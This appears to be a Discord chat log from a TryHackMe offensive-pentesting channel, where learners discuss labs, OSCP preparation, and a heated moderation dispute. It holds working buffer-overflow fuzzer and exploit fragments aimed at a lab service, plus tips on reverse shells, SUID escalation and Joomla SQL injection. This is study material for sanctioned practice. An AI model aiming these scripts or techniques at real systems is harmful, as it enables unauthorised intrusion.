retn = "BBBB"        # these 4 bytes should land in EIP once the offset is right
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")   # python2: str is already bytes
    print("Done!")
except:
    print("Could not connect.")
```
Restart oscp.exe in Immunity and run the modified exploit.py script again.
The EIP register should now be overwritten with the 4 B's (e.g. 42424242).
not sure how to confirm this, the log shows,,, is this correct?
Log data, item 0
Address=42424242
Message=[12:15:05] Access violation when executing [42424242]
@keen iris is there something wrong with my command?
Why ping me here?
since this repo was from your account...
got it...thanks
It's not my exploit
It worked for me sir.....still if it isn't finished, would you mind sharing what's missing?
Hey everyone! I've recently completed DailyBugle but I used joomblah (https://github.com/NinjaJc01/joomblah-3.git) to fetch username and password. Has anyone done that part manually? I tried using payloads as per https://www.exploit-db.com/exploits/42033 and got this info but didn't really understand it. Has anyone else visited this endpoint?
use sqlmap buddy
@fleet wedge Thanks for answering sir, but since it isn't allowed in oscp, I am looking for a manual way of doing it. Have you come across any?
Oh so you are practising for oscp
I'm just here to gain knowledge and modifying some scripts
ill look into the script 🙂
I am actually a beginner 😅 but still trying both methods where ever possible.
That's great if you not using any automating tools 🙂
Yeah, that's way more satisfying 😄
I'll suggest looking into the sqlmap script and trying to modify the joomla script as per your need
Ok sure! I'll try that. Thanks 🙏
most cve doesn't work for me lmao
Same here 😅
Yeah, that sounds cool! How good are your coding skills btw?
Is this correct?
Nah i'm a script kiddie lmao
i have to google up everything (most of the things 😁 )
but modifying scripts is helping me improve
I don't know if i should put my modified scripts on github
Yeah, actually this was written as per python and I used python3 so it's throwing errors.
nah im talking about ip address
i think you have to change it manually
use python with required modules installed using pip or pip3
you have to change the ip address in the script manually ig
Oh, but it worked fine with python
I don't really know how... But for the manual part, I'll go in depth
and it's Joomla CVE
is your box using Joomla or something?
It won't work on everybox
Yeah! DailyBugle
Oh!
yea so try changing the ip in the script
Didn't find any problem ig, it should work
Well it worked @low knot 😁
It's a hash if im correct
try decoding it
Yeah it's working. I think there's a misunderstanding
yea
joomblah was working before
I am done with this machine
apologies for my dumb brain
by using joomblah
it's okay...lol
and now I am looking for a manual method.
since, joomblah automated the process
IF the script worked, now try reading the script and understand it
What did it do
Yeah I am doing that
i haven't started with buffer overflows 🥲
Same here🥴
3 machines are yet to be done before starting them........
Hello everyone, starting this path now. 🙂
can someone tell me some offensive techniques of pentesting
? @past escarp
typing really hard and really fast on your keyboard
don't know what exactly do u mean by techniques but personally I feel being a good reader would really help me. I feel lazy reading lengthy blogs but as I am leveling up, finding videos on core concepts is rare n so reading becomes mandatory in the long run.
In case u turn out to be a voracious reader, kindly ignore....lol
i haven't seen any1 doing the windows priv esc room
:0
i just realized that exists and gives a badge lmfao
Days of reading and learning and practicing guaranteed: https://book.hacktricks.xyz
I love Hacktricks
hello
can someone refer me to a source on some windows internals for a behavior regarding the Alfred room?
I don't know how much detail is OK to say here
Well we need enough information to know what you want to know
Coming from OSCP-style labs and don't know the actual policy regarding spoilers 😄
but i'll be more specific:
how does windows work with files regarding primary/impersonating tokens?
Urgh that's a mess
i tested and impersonated Admins group, getuid returned system account
but i still couldn't see files
https://www.exploit-db.com/papers/42556 Ashu linked this one previously
there is info about backup files and restore files there, but the actual directory content listing is not mentioned
I don't get Access denied , like I thought I would
but rather File Not Found
Yeah, it acts like the file doesn't exist
You don't have permissions to even know the existence
I'm trying to understand the difference between access denied and file (or any other object) does not exist
Well, one of them is you're not allowed to do what you're doing
Transparently, I get 2 different GetLastError() codes
The other is you're not even allowed to know the existence
(Or it actually doesn't exist)
is there any way to check what i am not allowed to know of ?
that is, before I privesc into a process with god primary token
not even icacls works
this lab helped me learn about some stuff I wasn't aware of before, but now I'm trying to get around to understanding it
Surely that'd mean you know of it then?
I think the paper I linked might be helpful
i'll have a more thorough read and come back if I can't find the answer there or somewhere else
thank you for your time 🙂
Hi guys, i started the complete beginner path and reached the windows active directories, what would you recommend:
1-Doing AD then complete the intro to windows
2-Doing the windows intro, then AD, even if it's not part of the path
2
Im on Task 3 of vulnversity, Is this running alright?
@fleet wedge yes however rockyou is a password wordlist, not a wordlist for directory brute forcing
You can probably research that quite quickly
Hi can anyone help me out with bufferoverflow
buffer overflow*
i am unable to get the reverse shell
Where are you getting that error?
what is the problem
I am having problem here. Doing Vulnversity Walkthrough and got stuck on netcat and reverse shell
error msg WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
What IP did you put in the reverse shell?
Are you using a Kali VM?
yap
Connect to the VPN directly from Kali, not from the host OS.
ahh great
now its working
my thoughts were bad
so now everytime when i want to be on thm i need host OS connected to VPN and VM too?
No.
JUST in the VM.
ONLY in the VM.
You cannot connect from multiple devices at once.
Please don't call me bro. It's uncomfortable because you don't know me.
I'm just starting on this path and I'm wanting to know if you guys have any advice at all or like somethings I could do to get better
the path takes pretty good care of you but it is always nice to go through some of the other training rooms that introduce tools like burpsuite, nmap, wireshark etc. as this knowledge will come in handy when you get to some of the more difficult rooms in the path
The PTS is free! Good resource
I will say THM’s paths feel miles ahead of its competitors in terms of learning.
THM is excellent for beginners and learning the basics but there's plenty of other resources out there too, that, in my opinion, are better for testing your overall skills
Sorry, that came out harsh. THM is excellent in almost every aspect. I just mean as a testing/validation platform, theres a few others out there that sit a bit better.
Don't limit yourself to just THM.
Good point bro
Please don't call me bro. It's uncomfortable as you don't know me.
We need a bro bot counter with standard reply
Never heard anyone have a problem with being called bro before.
Is it some kind of meme that i'm not aware of?
No. It's just a term you use for people who are like a brother to you. Or at least someone you know at a bare minimum. And that's without getting started on how it's often levelled at women.
I feel like you're probably reacting a little bit too strongly to this.
I feel like I'm asking you not to do something and that you should respect that?
what are you even on about? the guy simply thanked you
I respect you asking me, doesn't mean i'm going to do it.
Hey @barren beacon Please respect peoples choices to how they like or don't like to be addressed 🙂
Please don't call me krsecurity, call me bro.
That seems to be a sarcastic response, C'mon lets be civil here.
I was perfectly civil to be fair, and yes trolling a little, sorry for that. Just seemed weird for James to get all touchy about a singular word.
Well, it's not the word, per se, it's the familiarity that it implies.
And James isn't 'touchy'. He explained why and was polite about it.
Anyway, this is probably the worst conversation i've ever been a part of so i'm going to bow out and get back to work.
Good to hear it. Good luck with your work 🙂
I was wondering when you'd finally press enter, Ugi 🙂
As you can see, it was all explained above.
And we have now moved on.
My point Esqy is that him being offended is his problem, not mine
You can't spend your whole life objecting to social normality
Ok.
I'm just surprised that such meaningless words can actually upset you? There are bigger obstacles and hardships in life than getting called bro
Well, that c word is one I don't like.
just comes off very unprofessional
-warn @barren beacon Please don't use such foul language
⚠ Warned krsecurity#1598
Ugi - As does arguing over an issue that you have 0 vested interest in.
this is borderline pathetic
you're filtering people who disagree with you, rather than discussing the point raised
Let's calm down here please 🙂
@proper condor please remember that the staff in here are volunteers, not professionals. They don't have to accept being addressed in ways that they feel uncomfortable with. We would address you the way you wished to be referred to, so please afford others the same courtesy.
It's a mark of respect to not go against someone's wishes when it comes to how you speak to them. That is a valuable lesson to learn for the real world as well, for the record
Thank you for the valuable lesson, but you're in no position to be giving life advice, especially when this chat seems to be run by highschool kids with no practical life experience. What's next? If I disagree with you you'll mute/ban me too?
Wow. That is a lot to unpack right there. There are some assumptions in that block of text which are frankly laughable, and say a lot more about yourself than they do anyone else here 🙂
But no. Believe it or not I'm not a big fan of "punishing" people. If you want to cause a disturbance then sure -- my job is to maintain the peace in here. If you want to be an arsehole then maybe you'll end up banned; but that's not something that happens for disagreeing with someone.
You got something to say me to drop a PM, thicker skin is paramount in life, maybe it isn't when you're simply hiding behind your mod status
Are you ok?
Perfectly fine, are you?
Grand, thank you for asking 🙂
Yeah, I'm great 🙂
I'm an ethical hacking student working as a pentester. Esqy has a more interesting set of roles which I'm sure he'll tell you 😆
Personally? My family own and run several large businesses and I provide support in the form of HR, PR, Maintenance and all sorts of other things. In my spare time, I convert vans into campervans and build cool retro arcade machines. THM and Hacking is a side-hobby, which is continued from my computer degree and years as a Digital Forensic Analyst
life outside your bedroom will throw bigger challenges at you, than getting called bro, I'm ex mil, you wanna give me a shout we can chat and discuss outlook on life and overall philosophy, I wish you all the best folks, but this whole bro fiasco portrays you in a very negative light
Enjoy your evenings
I'm up for booty calls whenever you need help, take care
👋
Ah. I see you made assumptions about us. You are correct to a point. However, as an ex-military person, it surprises me that someone choosing how they want to be addressed has triggered you in such a way as to have this outpouring on a Discord. Hence why I asked if you were ok.
when you have weak people in position of power, its only a matter of time till that power gets abused
And that statement was crafted to offend.
anyhow, You said you were off, so I won't take up any more of your time 🙂
ask anyone in police service/firefighters or army
you'll receive the same response
I'm available anytime, if u do wanna chat
take good care of yourself
Oh get lost you, get off your high horse and have a real conversation
I banned him, that conversation reeked of immaturity and veiled conceited beliefs on their end
You got this! And more importantly have fun! @near ginkgo
goodluck
How well would people say this path preps people for the OSCP?
something I would like to know too ^^
It prepares you for offensive security (as a practice) in general, it's not related or specifically geared towards OSCP.
Looks like fun convo, I’m NEW NEW so hi everybody ( i have been playing with Kali and Friends for awhile)
-undelete -a
@chrome valve
Generally best to avoid social media during your exam tho.
Buffer Overflow Prep - Overflow1 - the !mona findmsp -distance doesn't work. Am I doing something wrong? Or is the exercise noted/instructions out of date?
It doesnt return any EIP value
But it isnt
are you looking at your log
its not displaying any of the content it should
yes, I'm looking at the log and the output screen as well
should look like this:
```
0BADF00D   !mona findmsp -distance 2400
0BADF00D   [+] Looking for cyclic pattern in memory
750C0000   Modules C:\Windows\System32\wshtcpip.dll
0BADF00D   Cyclic pattern (normal) found at 0x018bf272 (length 2400 bytes)
0BADF00D   Cyclic pattern (normal) found at 0x007e394a (length 2400 bytes)
0BADF00D   Cyclic pattern (normal) found at 0x007e4d7a (length 2400 bytes)
0BADF00D   [+] Examining registers
0BADF00D   EIP contains normal pattern : 0x6f43396e (offset 1978)
0BADF00D   ESP (0x018bfa30) points at offset 1982 in normal pattern (length 418)
0BADF00D   EBP contains normal pattern : 0x43386e43 (offset 1974)
0BADF00D   EBX contains normal pattern : 0x376e4336 (offset 1970)
0BADF00D   [+] Examining SEH chain
0BADF00D   [+] Examining stack (+- 2400 bytes) - looking for cyclic pattern
0BADF00D   Walking stack from 0x018bf0d0 to 0x018c0394 (0x000012c4 bytes)
0BADF00D   0x018bf274 : Contains normal cyclic pattern at ESP-0x7bc (-1980) : offset 2, length 2398 (-> 0x018bfbd1 : ESP+0x1a2)
0BADF00D   [+] Examining stack (+- 2400 bytes) - looking for pointers to cyclic pattern
0BADF00D   Walking stack from 0x018bf0d0 to 0x018c0394 (0x000012c4 bytes)
0BADF00D   0x018bf168 : Pointer into normal cyclic pattern at ESP-0x8c8 (-2248) : 0x018bf7a0 : offset 1326, length 1074
0BADF00D   [+] Preparing output file 'findmsp.txt'
0BADF00D       - Creating working folder c:\mona\oscp
0BADF00D       - Folder created
0BADF00D       - (Re)setting logfile c:\mona\oscp\findmsp.txt
0BADF00D   [+] Generating module info table, hang on...
0BADF00D       - Processing modules
0BADF00D       - Done. Let's rock 'n roll.
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:06.037000
```
run the py again, something got out of whack, best to start again,, making sure all steps, are executing,
i can fizz the app
i'm not that far ahead of you, it's not hard just a lot of little steps,
i bought this to help with my oscp but this is turning out to be as frustrating as the oscp
i can fuzz the app
i've got the length plus 400 (i.e. 1700) for pattern create
but something appears wrong with mona
it looks for cyclical patterns in memory
then goes straight to examining registers
then straight to examining SEH chain
then asks if I'm connected to an application despite it listing the oscp app!
I've even disconnected from both the windows 7 box and the attack box but the same result
The distance should be the same for overflow1, which crashes at 2000,
mine stopped at 1300
just re-ran it (copied direct from the page) and it stops at 1300
```python
#!/usr/bin/env python2
import socket
import sys
import time

ip = "10.10.209.186"
port = 1337
timeout = 5

# build 30 strings of increasing length: 100, 200, ... 3000 bytes
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)  # read the service banner
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        # once the service has crashed the connect/recv fails: note the last length sent
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
```
I'll try that
i don't understand, forgot about the import backticks
Google "code blocks in discord"
I'm now going backwards
it now only sends 100 bytes before it loses the connection
but i can still nc to it
sorry about the code thing, python is all about indentation, prefer old fashion ;
Were you using python 2 or 3?
ive just used the kali one and the fuzzer crashed at 2000 bytes
For the attackbox you need to use python2 as your command
i was using python2
python or python2?
and the eip on the win7 box has 41414141 in the eip
much of the oscp still runs on python2 so just assumed the same here
let me test the exploit.py
and exploit.py works
and !mona findmsp -discover works
-max and NinjaJc01 | James thanks for all your help and patience
ohhh,
I have been using python
so, in OVERFLOW3, if the fuzzer crashes at 700, made payload at 1100, and it's not crashing the server, is it ok to just say bring it up to 1200?
yep
my experience from oscp is to just keep upping the buffer til you get a crash
much like nop sleds you got to try trial and error to find the exact match
a bit like bad chars, though i like the mona way of discovering them, looks much more efficient
exercise one completed OK, I'll bear in mind the lessons from today - thanks once again for your help
yay just finalized the path
as somebody who knows nothing abt nothing
would doing complete beginner path -> this path be a good roadmap?
Pretty decent. Don't be afraid to go off the path and do some rooms that seem interesting tho
I'd do complete beginner, some easy challenge rooms, then this path
So the tool I was using today gave me 2 interesting outputs on websites I was testing. Both were similar DOM based exploits. Would it be the api or the webpage itself that would be susceptible to attacks in that instance?
Hi, does anyone know why my buffer overflow attack pops shell in a THM machine but not when fuzzing in immunity debugger? I've set my AV to ignore immunity debugger and the relevant exe but it didn't help. Thanks!
Hello guys
So I've just passed my eJPT, and I am planning for the OSCP
I will purchase 3 months PWK lab access during the summer holiday, so what is the best thing I can do now as a preparation for the OSCP exam?
Shall I do Dante pro lab or the machines on the TJ_Null list?
My prep list is pinned in the channel. Add Gatekeeper, Relevant, and Internal to it.
You're missing execute on it
yes the most important one lol
that last x right
The letters rwxXst select file mode bits for the affected users: read (r), write (w), execute (or search for directories) (x), execute/search only if the file is a directory or already has execute permission for some user (X), set user or group ID on execution (s), restricted deletion flag or sticky bit (t). Instead of one or more of these letters, you can specify exactly one of the letters ugo: the permissions granted to the user who owns the file (u), the permissions granted to other users who are members of the file's group (g), and the permissions granted to users that are in neither of the two preceding categories (o).
this is just not very readable
I don't get it, have the file as root, put the +s flag as instructed , and like i'm missing a certain something
Yeah, you're missing execute on it
it's rw- rn
Needs to be rwx
Good
You don't want the capital S
Capital S means suid without execute which is useless on a binary
It's fine now.
i was just about to google that SUID S,,,
ohhhh, so capital S bad
thank you sir
why ohhh why am I not root?????????
😫
it doesn't have suid permissions
ohhhhh i think i'm having a good moment
lol
ok, so I thought that when I execute the bash file that would change the user to root, terribly confused ,
Yeah it will. If the permissions are correct.
Because it needs to be a suid binary
so i did all the permission chmod stuff in my box and then uploaded the file, It sounds like I should have done that in the mount file,
Yeah.
thank you for like the ,,, lost track,
So I have recently got into this cyber-security field and I'm loving it. I've been on tryhackme for about more than a week but whenever I try to do a ctf room by myself without any help I always get stuck. Then I got to look up a walk through on youtube so I can solve the room I'm in. Could I get some tips to like help me with this. I do a nmap scan, then I look for hidden directories with gobuster, and then look around the webpage and try to exploit it and I usually find the first flag but then there's like two or three more after that and I always get stuck on that. Could I get some tips on that too please.
Check out gtfobins and lolbas for privilege escalation.
alright thank you 🙂
Were you connected to the THM VPN?
OpenVPN?
Yeah. That's something you'll need in order to interact with room VMs. That, or interact from the attackbox.
It's a fundamental thing that applies all over THM. Something that was covered in the Welcome room which you were put into when you joined

FWIW I think subscribing is worth it. The learning paths are pretty cool if you're starting out, the extra VM resources make everything smoother, the attackbox is useful if you don't have your own kali or don't want to mess with it, and the sub only content's pretty neat.
Full disclaimer: I'm loosely employed by THM for some of the box dev work I do. I don't get paid for people who subscribe, but I have made some of the content that features in paths, event rooms, and some sub only rooms
Plus you get your own instances. You need HTB VIP+ for that over on HTB.

Any idea why in the Alfred Room my meterpreter shell won't load? As you can see the session opens then nothing happens no prompt. If I hit enter it just says shell session closed. https://prnt.sc/10iykyy
Does your payload in multi/handler match the one that you generated?
rip looks like I didn't specify a module. Thanks.
Payload, not module. The module is multi handler
Hmmm. Payload is wrong I think. Generic not windows reverse_tcp
yea
Thank you. Working now.
Just needs to line up with what you generated
The command from the room didn't work so I just launched the module and set options on my own. Didn't even think about payload. Good lesson I learned for sure. Thanks again. Might have spent hours trying to figure it out. 🤦
Why no root.txt? Tells me right where it is but it isn't there.
https://prnt.sc/10iz5xl
https://prnt.sc/10iz6hh
Also confused why I can't launch a shell. When I type shell it just says channel created but I don't get command prompt.
You need to migrate to a process that has privs to see the file
Windows tells your process the file doesn't exist if you don't have perms to know of its existence
Oh yeah, I forgot about the spool migration.
getuid shows me as system though so do I still need to migrate process?
Okay. I'm not sure I totally understand that, but I can read about it. Yeah, I am impersonating SYSTEM. Thanks again for your help. Much appreciated. I probably am pushing too hard to advance and need more basics, but I tend to learn best by doing. A few months back I had never really even used Linux and feel much more comfortable now.
I don't really understand the $ operator
I'll try my best;
Essentially the $ operator indicates a variable. If you run env it should spit out a bunch of variables with values (VARIABLE=VALUE).
Using the $ operator you can load in a value by its assigned variable name. For example if VAR=ABC123 and you do echo $VAR, then rather than printing out $VAR it will be replaced with ABC123.
A useful case for this is if you need to know what user you are, the USER variable is always set to the user you're currently logged in as, so $USER will always be replaced by your current username.
I am on Blue. I have exploited it via Metasploit. I am trying to exploit it manually. There are loads of instructions online. I have got the python file. I have run a pipe parameter scanner against it but nothing is returning.
I have done a manual one and one on Metasploit.
I need it for the python script
any advice?
You'd then override the USER variable (do keep in mind that it's case sensitive), however whenever you log out and log back in then the system would set USER to whatever the user is you're logging in as.
Interesting... Is it actually useful? It sounds almost useless
It's probably more useful for in Bash scripts etc, there's more variables that the system automatically sets as well that could be useful for general use. For example you can find out what shell you're using with echo $SHELL, or your home folder with $HOME etc. And probably most important the $PATH variable, which determines where your system looks for executables.
ah okay then
So its usage is quite niche in pentesting then?
I bought the subscription yesterday, and it's really good
Having a browser-VM
Is the Corp room working fine? I can't do much. I don't have an internet connection. I can't open the start menu. I tried connecting through Remmina, and the attack box, and it's the same. I don't know if I can open a terminal without the start menu either.
That works, there I have a shell!
Haha. Thanks Ninja.
ayo, is there such a thing as panels?
Huh? @fleet wedge
how do I go to /tmp/aa$?
That question needs a whole lot of context
xD
I can't post an image.
Like on Linux Fundamentals 3, it's showing examples of it doing commands in that directory,
but I am not in that directory.
!docs verify
Follow those steps
The images are for illustration, not for instruction.
oh lol
But yeah, verify then you can post images.
for the question: Using absolute paths how would you make a directory called test in /tmp
why isn't this answer working?: cd /tmp && mkdir test
because that's overly complicated
Look at the answer format
Look at your answer
Your answer does not fit.
Don't post answers
ah okay. And I don't have to be in the /tmp directory for it to work?
That's why it says using absolute paths
There's nothing offensive about pentesting. How else will we know whether ballpoint or felt-tip works best?
Okay, okay... I'll get back to lurking and learning...
@fleet wedge https://www.youtube.com/watch?v=2LOtBpA7W_M
This is a typical day as a pen-tester. As a professional pen-tester I wanted to share how this work really looks like and what kind of skills are required.
In memory of bonkura ❤️
(1st April) Pen tester. Get it?
You should watch that 
Must admit that, those flip techniques are impressive
Felt like getting rick-rolled
For Linux Fundamentals Part 3, is there an answer for task 7 (binary - shiba3) that actually involves what was learnt from the room?
It's not possible to answer the question from what is taught
You learn some things you need in fundamentals part 1, something else in part 2, and the rest in part 3. All combined, you will be able to tackle that task
Is there any way for the certificate to use my full name instead of the username ?
I know in other places (codecademy) I would change the name , print the cert, and then change it again, @round summit
ohhh, "Email support@tryhackme.com with your existing username and tell them what you want to change it to and they will change it for you" @round summit
Alright. I will just ask about the whole deal again just in case, maybe there is no need to change the username. Thanks.
Set it in your profile
But it will not apply retroactively